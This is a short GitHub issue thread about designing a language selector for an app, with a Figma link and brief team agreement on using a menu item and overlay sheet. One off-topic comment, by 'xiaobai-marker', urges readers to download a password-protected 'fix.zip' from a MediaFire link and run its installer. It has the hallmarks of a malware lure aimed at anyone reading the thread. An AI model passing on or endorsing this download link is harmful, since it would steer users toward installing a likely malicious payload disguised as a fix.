### ISSUE TITLE
Design language selector - Spanish

### ISSUE THREAD

**Issue by DerekCaelin** [techmatters/terraso-product#1024]
Design language selector and experience for user to pick their default language (EG detect device language? dropdown menu?)

[Figma design](https://www.figma.com/design/KMJbhjVyrrLFHj6jGcX9lN/LandPKS-Design-Prototype-working-file?node-id=10203-26039&t=xIob47dxnX9bGyFW-1)

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CourtneyLee333** [comment]
@DerekCaelin @tm-ruxandra Does the design make sense to you - using a MenuItem and FormOverlaySheet? In the future, when we have more settings, we might organize differently. But for now this can scale for more languages, and the units of measure setting could follow this pattern as well.

**Comment by DerekCaelin** [comment]
Looking at the design [here](https://github.com/techmatters/terraso-product/issues/1032) - that meets the need, I think.

**Comment by tm-ruxandra** [comment]
@CourtneyLee333 Makes sense to me!
